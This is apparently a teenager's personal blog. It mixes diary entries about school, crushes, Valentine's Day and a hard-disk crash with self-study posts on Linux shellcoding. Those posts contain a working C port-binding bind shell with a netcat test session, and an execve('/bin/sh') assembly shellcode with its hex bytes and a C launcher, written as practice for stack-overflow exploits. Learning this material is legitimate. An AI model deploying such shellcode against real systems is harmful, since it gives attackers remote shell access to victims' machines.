i still can’t find any good free hosting.
here’s the deal, i posted my portbinding shellcode first for practice here..
and i figured, “what the heck”, i’ll create another page where i can put my journal on other matters too!
and another
see ya.
i’m finding it extremely tiresome transforming the important parts of objdump -d to valid c strings, so today, because i’m bored, i made something in c that parses objdump -d result and generate a complete c shellcode from it which i can copy with ease into an editor. i call it genshc.
no error checking and stuff like that. basically assumes a lot. relies heavily on a (hopefully) _unique_ objdump -d output. it’s been working ok so far.
what other things are happening in niel’s land?
moving on to aleph one’s smashing the stack for fun and profit article. where i hope to put the fruits of my shellcoding labor to use for a change.
reading a book about the bios boot specification while doing separate studies on grub’s bootsector. and how boot sectors work in general. i’ve got the “boot then hang” concepts covered now.
in relation to that, i’m also studying interrupt 10h - video services and it’s related bios video functions.
i asked my mom if i could drink coffee and she said no.
getting addicted to dragon ball z (again) and great teacher onizuka.
more to come.
over the past days, i’ve had some opportunity to think about where this blog (gnurbs dot blogsome dot com) is going. i’ve been posting too much stuff under hermetic studies it seems. as far as how rewarding that is to me, i reckon that this shouldn’t be the place to document my experiences on things other than life, thoughts, love, girls, and more importantly, steph any longer. i look at my blog now and all i see are weird constructs that don’t make any real sense whatsoever, even at third glance. those gray blocks are dirty and unfitting to my blog’s title and the only reason why i put them here is because i believe that hobbies are part of life too and i have nowhere else to put my documented experiences.
so i’m looking for free hosting now where i can move hermetic studies stuffs in. don’t know what i’ll call the new site yet but the theme would definitely be simple - bare - boring - ascii - monotone. hopefully, i can also offer my example files for download there. i think it’s also great if i can own steffylove.net.
i better get to work with google then.
the second of a many part series.
first, some unrelated stuff i want to share. we talked about marriage and mate choosing in religion class today. i can’t stop looking at iris. she’s so sexy! and her black bag makes her even more sexy when she walks! we had a (sort of) activity about our preferences when choosing a mate and i can’t fucking believe i’m the only fucking one among the guys who chose number 9 - “i want a girl i can look up to very much“.
we were asked to choose 6 among ten choices and these were my answers… i want a girl who:
1) loves me.
2) who shows me a lot of affection.
3) who appreciates what i want to achieve.
4) who understands my moods.
5) who stimulates my ambition.
6) who i can look up to very much.
in other words, i want to marry someone _exactly_ like steph. no other girl comes close. i wonder what iris answered. oh well, i suck at girl-friend-ships so i’m moving on.
(more…)
well, not really but i’m getting close. this is part one of a many part series. initially, so damn clueless about it. and aside from the fact that in linux i have to use it’s own interface for socket system calls (socketcall because there are no systemcalls for socket(), accept() and friends) instead of calling socket functions directly, i think that making a portbinding shellcode was a bit more complex than any of my previous attempts at shellcode making. at least at first glance i thought it was. zillion of safemode.org in his article, presented a c code that was tested in freebsd and it really clarified the whole thing to me. i got his algorithm from looking at his source and together with some man pages, i decided to make one too in my box.
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <stdio.h>
#include <errno.h>
#define SHELLPORT 1435
struct sockaddr_in shelladdr;
void test_errno(int ret);
int main(int argc, char **argv)
{
int err;
int sockfd; /* socket file descriptor */
int shellfd; /* shell file descriptor */
char **shargv;
shargv[0] ="/bin/bash";
/* if (fork() == 0){*/
shelladdr.sin_family = AF_INET;
shelladdr.sin_port = htons(SHELLPORT);
shelladdr.sin_addr.s_addr = INADDR_ANY;
sockfd = socket(PF_INET, SOCK_STREAM, 0);
test_errno(shellfd);
err = bind(sockfd, (struct sockaddr *)&shelladdr, sizeof(struct sockaddr_in));
test_errno(err);
err = listen(sockfd, 1);
test_errno(err);
shellfd = accept(sockfd, NULL, NULL);
test_errno(shellfd);
dup2(shellfd, 0);
dup2(shellfd, 1);
dup2(shellfd, 2);
execve("/bin/bash", shargv, NULL);
/* }*/
return 0;
}
void test_errno(int ret)
{
if (ret == -1) {
fprintf(stderr, "%s\n", strerror(errno));
exit (errno);
}
}
[ walkthrough ]
in a nutshell, i basically have to setup a tcp socket() that bind()s itself to a defined port (1025+), listen()s and accept()s for a connection. when a connection has been made, duplicate the communication file descriptor created as standard input (stdin), standard output (stdout) and standard error (stderr) file descriptors, all defined in /usr/include/unistd.h and then just call execve() normally.
you might have noticed the commented fork() statement above. well, at first i didn’t actually care to use it. but after testing the program i understood it’s purpose. as how i understood it, the program would eventually be translated to assembly shellcode and injected to a some other program who’s buffer has been overflowed. the progr am must fork() a new process, otherwise the calling program (the host program where this will be injected) will stay there waiting because of accept(). in some cases, this is desirable, but for most, i suppose it isn’t. anyway, for my activity, i commented it out. because it makes studying easier.
for you visual people out there, here’s how it went.
on my first terminal, i compiled the source above and ran the program.
steph@heaven ~/git/null/asm/shellcoding/portbind $ gcc -o portbind_c portbind_c.c steph@heaven ~/git/null/asm/shellcoding/portbind $ ./portbind_c -- notice that the program listens()s here now so no prompt --
my second terminal, i used just for verification.
steph@heaven ~ $ netstat -l | grep -i tcp tcp 0 0 *:1435 *:* LISTEN
hey! it’s there! then i initiated a connection using netcat.
steph@heaven ~ $ nc localhost 1435 whoami steph pwd /home/steph/git/null/asm/shellcoding/portbind ls portbind_c portbind_c.c
the bold strings are the commands i issued. at first i thought that it didnt work because i was expecting a prompt. i don’t know why the prompt isn’t shown. this sucks 
i’ve also tried manually setting up PS1 but the prompt is still missing. the commands are in bold.
steph@heaven ~ $ nc localhost 1435 export PS1=shell@remote set | grep -i PS1 PS1=shell@remoteother environment variables seemed to work, like setting $TERM so i can use “clear”. anyway, the prompt is not that important. i’m just happy i got a shell . now for the assembly version. i’ll need steph’s power on this one.
p.s.
incase you’re wondering why i chose port 1435, it stands for “i love you steph“. symbolic isn’t it?
until next post.
so far, i’ve only been doing simple program loading using sys_execve in shellcodes. simple in the sense that no arguments are being passed to loaded programs. unfortunately, running a program without any argument produces rather boring outputs. today, i added a bit of twist to things. i tried to implement a shellcode that chroots into a particular directory.
first, an introduction.
chroot or “change root” for that matter makes it possible for a user to run a command or interactive shell within a special ‘user defined’ directory.
of course, a little bit of preparation is required before running chroot. one needs to imitate his/her root directory. here’s how mine went.
first, i made a directory that will act as my fake root.
steph@heaven ~ $ mkdir myroot ; cd myroot
once i’m in my fake root, i’ll be using /bin/bash, /bin/ls and /bin/pwd so i also need to create a bin directory inside my fake root where bash, ls and pwd will reside.
steph@heaven ~/myroot $ mkdir bin
then i copied the bash, ls and pwd binaries into it from my ‘real’ root.
steph@heaven ~/myroot $ cp /bin/bash bin/ steph@heaven ~/myroot $ cp /bin/ls bin/ steph@heaven ~/myroot $ cp /bin/pwd bin/
things are not done yet! i still had to resolve their shared library dependencies for them to work! i first resolved /bin/bash’s dependencies.
steph@heaven ~/myroot $ ldd /bin/bash
linux-gate.so.1 => (0xffffe000)
libdl.so.2 => /lib/libdl.so.2 (0xb7f19000)
libc.so.6 => /lib/libc.so.6 (0xb7e01000)
/lib/ld-linux.so.2 (0xb7f28000)
it uses some files inside /lib! so inside my fake root, i also create a lib directory and copied the shared objects there.
steph@heaven ~/myroot $ mkdir lib steph@heaven ~/myroot $ cp /lib/libdl.so.2 lib/ steph@heaven ~/myroot $ cp /lib/libc.so.6 lib/ steph@heaven ~/myroot $ cp /lib/ld-linux.so.2 lib/
i did the same for ls and pwd. printing their shared dependencies using ldd, then copying them to their respective directories inside my fake root. after copying, i verified if everything was in place.
steph@heaven ~/myroot $ ls -l * bin: total 761 -rwxr-xr-x 1 steph users 680316 Feb 19 15:33 bash -rwxr-xr-x 1 steph users 75268 Feb 19 15:33 ls -rwxr-xr-x 1 steph users 15716 Feb 19 15:26 pwd lib: total 1301 -rwxr-xr-x 1 steph users 83620 Feb 19 15:36 ld-linux.so.2 -rwxr-xr-x 1 steph users 1228960 Feb 19 15:36 libc.so.6 -rwxr-xr-x 1 steph users 10892 Feb 19 15:36 libdl.so.2groovy! my fake root looks like a real simple root now! time to test it.
steph@heaven ~ $ chroot /home/steph/myroot /bin/bash chroot: cannot change root directory to /home/steph/myroot: Operation not permittedoopsie! i guess i better run chroot as “root”.
heaven steph # chroot /home/steph/myroot /bin/bash bash-3.00#
it worked! let’s try running some commands inside the fake root shall we?
heaven steph # chroot /home/steph/myroot /bin/bash bash-3.00# ls bin lib bash-3.00# pwd / bash-3.00# cat bash: cat: command not foundi tried running three commands inside my fake root. first was ls. and it showed the contents of my chrooted directory. next was pwd and it showed my present working directory, that happens to be “/” of my fake root. and lastly, cat. but it didn’t work. that is because i don’t have cat inside my fake root. i only copied three files and their corresponding dependencies. a good chroot directory must have all the important files or binaries for it to be productive. also, it must not contain useless files that won’t be used. in my case, it was the cat command.
lastly, i exited my chroot environment and copied the fake root folder (myroot) to where the real fun will happen. inside my git repository!
steph@heaven ~ $ cp -r myroot ~/git/null/asm/shellcoding/
it was too bad that i had to run chroot as “root”. quite creepy.
next page: the shellcode
(more…)
implementing sys_execve in asm was a pain. but i had to do that first on a normal assembly listing before doing anything else. i saw two implementations. one made use of the stack, which i happen to fancy. and the second one uses a predefined string.
i tried both styles but for this entry, i'll be showing the shellcode that utilizes the stack.
global _start
section .text
_start:
; setreuid code block here
jmp short .setup
.spawnshell:
pop ebx ; ebx holds string address
lea esp, [esp-8] ; room on stack
and esp, -8
mov [esp], ebx ; first dword holds string addr
xor eax, eax
mov [esp+4], eax ; second dword holds null
mov al, 11
lea ecx, [esp]
lea edx, [esp+4]
int 0x80
.setup:
call .spawnshell
db '/bin/sh'
[ explain ]
one must have noticed this by now, how come we first need to jump to the last part of our shellcode where we declared our string? moreover, how come the string get's declared last?
it’s because we want to have a negative address offset to the call instruction. otherwise, we will have null bytes. since the address passed is a dword. we actually never reach the very last line of the shellcode (which happens to be the string declaration) in order to execute it. also, sys_execve overwrites the calling program's text, data, bss and stack segment with that of the program being loaded.
Disassembly of section .text: 080480a0 < .text>: 80480a0: eb 1f jmp 0x80480c1 80480a2: 5b pop %ebx 80480a3: 8d 64 24 f8 lea 0xfffffff8(%esp),%esp 80480a7: 81 e4 f8 ff ff ff and $0xfffffff8,%esp 80480ad: 89 1c 24 mov %ebx,(%esp) 80480b0: 31 c0 xor %eax,%eax 80480b2: 89 44 24 04 mov %eax,0x4(%esp) 80480b6: b0 0b mov $0xb,%al 80480b8: 8d 0c 24 lea (%esp),%ecx 80480bb: 8d 54 24 04 lea 0x4(%esp),%edx 80480bf: cd 80 int $0x80 80480c1: e8 dc ff ff ff call 0x80480a2 80480c6: 2f das 80480c7: 62 69 6e bound %ebp,0x6e(%ecx) 80480ca: 2f das 80480cb: 73 68 jae 0x8048135
and based on those opcodes we construct a shellcode in c. we have a function pointer that points to our string where we placed our shellcodes. notice that each two byte value is prefixed by a "\x". this denotes that the value is hexadecimal.
char stack[]="\xeb\x1f\x5b\x8d\x64\x24\xf8\x81\xe4\xf8\xff\xff\xff\x89" \
"\x1c\x24\x31\xc0\x89\x44\x24\x04\xb0\x0b\x8d\x0c\x24\x8d" \
"\x54\x24\x04\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
typedef int (*fp)();
void exec(int (*fp)())
{
fp();
}
int main(int argc, char **argv)
{
exec((fp)stack);
return 0;
}
ok, so you all know the story about my hard disk crash last week. well, here`s the story behind that (at least most of the story anyway). this should have been posted last valentines, but i ran out of internet prepaid. great.
update: turns out, i still have prepaid left, my isp was just screwy last night. technology bites.
how often do you get blamed for something bad that happened that is seriously out of your control? and to add to that, how superflous are the reasons they`re spitting at you? that time when my hard disk crashed, i was only doing some usual stuffs while listening to some mp3s. after exhausting all doable means i could think of, i thought of the best possible way to tell the problem to my mom. this is a serious problem as far as i`m concerned since we really can`t afford to buy a new drive immediately. my cousin came and i got into a sort of, heated argument with her husband about the whole scenario. apparently, he was blaming me for putting all kinds of stuff into the drive that it overworked itself to breakage. that could be true to some extent, but then can`t it be possible that a hard disk is simply just another machine and infact capable of just breaking down after a few years? i asked him that question and he said it isn`t possible "basta basta". what the fuck is wrong with him? anyway, i`ve known him to be the kind of guy who thinks he is always right. as much as i hated his bullshit explanation about how to fix the drive talking about using boot disks and stuff like that, i still let him check my box out of politeness. he argued that i _must_ use a floppy at all costs (i used a livecd to at least show him that other than the drive, my box is still ok). practically pointless to use any kind of bootable disk here to fix the hard drive because the bios can`t even detect anything besides the dvd drive.
now, i figured that since hell, i`m gonna buy a new drive eventually, so i might as well also get gentoo 2005.1 ready. it`ll be a pain to update a gentoo 1.4 base on a dialup. i went to my other cousin`s house to get free dsl. and the download took at least half a day. md5sums checked out ok, but there was always a problem with the burning. the files were corrupted. that resulted me to go visit him a couple of times to reburn. anyway, i only needed some basic stuffs like the install cd and at least wvdial and fluxbox and their corresponding dependencies so i didnt mind the corrupted files. the next day, my cousin called me only to tell that his wireless optical mouse doesn`t work anymore. he asked me what i did last.. but hey! isn`t that tantamount to passing the fault on me? i`m sure i left their pc running when i left their house so i couldn`t possibly be the last person that used that. i went to their house without any money to go back home that day and replaced their mouse with a working one. luckily, they brought me home, otherwise, i`d be walking home at night a barangay`s distance at the very least.
my parents were shocked when we recieved a notice of disconnection from the power company that was due the day after we recieved that bill! what the hell!? my dad told me they forgot to pay our january bills that`s why. we had to make some emergency re-budgeting and my brother was furious because valentines was coming up. also, my headphone wire snapped, rendering the right speaker useless. my cellphone`s cancel call key doesn`t work anymore and then the cover lock broke. i had to glue it using mighty bond.
february 13, my brother`s motorcycle`s tire went flat. and since we were having financial difficulties because of the earlier issue with the electric company, my mom had to get money to buy a new interior tire from my allowance. she couldn`t possibly get money from my brother, again, because valentines was coming up. he has plans, i don`t. as simple as that. so now i have to suffer for being girlfriendless? isn`t being girlfriendless torture enough already?
today (february 14), globe telecom`s unlimited text service bailed out on me a couple of times since this afternoon. i was texting two girls xandra l and chris l when i suddenly ran out of load! apparently, my request reached their system at last and subtracted 15 pesos from my prepaid. (i registered for one day unlimited only) i rushed to the store to reload, naturally! since i can`t possibly leave such pretty girls hanging at the other end. (like what some girls always do to me) we were talking about valentines and it was a very interesting topic imho. it all ended with me bidding chris l goodnight and happy valentines. xandra l stopped replying, it`s either she got pissed off at my super late reply or she fell asleep waiting. either way, it`s my loss thanks to globe.
at the kind of luck i`m having with technology recently, it`s no wonder i flunked my cs class too. i don`t wanna add my love life rants into this scenario anymore. that`s an even tougher burden to handle. i`ll cry if i`ll talk about that.
i`m basically a dateless, penniless, loveless failure with every propensity to screw up at anything this love month of february.
lord have mercy.
valentines. what can i say. same as last year my friends. it\’s that time of the year again. the lucky ones get to go home late happy. some other lucky ones get laid. then, there’s the rest of us.
religious studies was boring as usual today. ended up just staring at iris and caroline. i skipped cs class after rs. didn’t really feel like spending another one and a half hour at school. i went instead over at zekkon’s (my favorite internet cafe) to play warcraft dota allstars. went home around 12:30, had cornedbeef for lunch. around 1, i started reading some portions of app-editors/vim\’s help.txt. stopped around 5 because goku’s fight with freeza is soo cool at dragon ball z (he’s also close to becoming a super saiyan) and of course, great teacher onizuka wouldn’t miss it for the world.
globe’s unlimited text is screwy today of all days! darn it. and so far, only one girl texted to greet, ms bernicel e. i wonder how she’s doing right now at this time or writing. lynlyn on the other hand seemed content on playing gunbound with jef so i’ll leave her alone till her excitement subsides (highly unlikely). my mom and dad have no plans whatsoever for tonight. my brother is the only family member making the most out of today. good luck to him. i guess he’ll get married sooner than i ever could.
i don’t know what to write next so let me redirect you to an entry i wrote one valentines ago.
girls suck.
as a pre-valentines gig, i`m posting from within app-editors/vim using scott yang`’s kickass movable type python script client thingy. net-misc/blogtk and net-misc/drivel were first and second choices for a blog client respectively but then i knew i had to try scott yang`s script the minute i saw it. since i`m in the issue of using the command line, i`’ll take this opportunity to say that i`m eyeing www-client/raggle for my news aggregator this round. the downside to this is that i need to merge dev-lang/ruby first.
i`ve merged all the everyday applications i`m using. now, i`m playing it safe, time to make a package-cd of /usr/portage/distfiles.
as for the mtsend.py configuration, commands and their relative vim keymappings (which i haven`t made yet), i`ll save them for some other time.
Get free blog up and running in minutes with Blogsome | Theme designs available here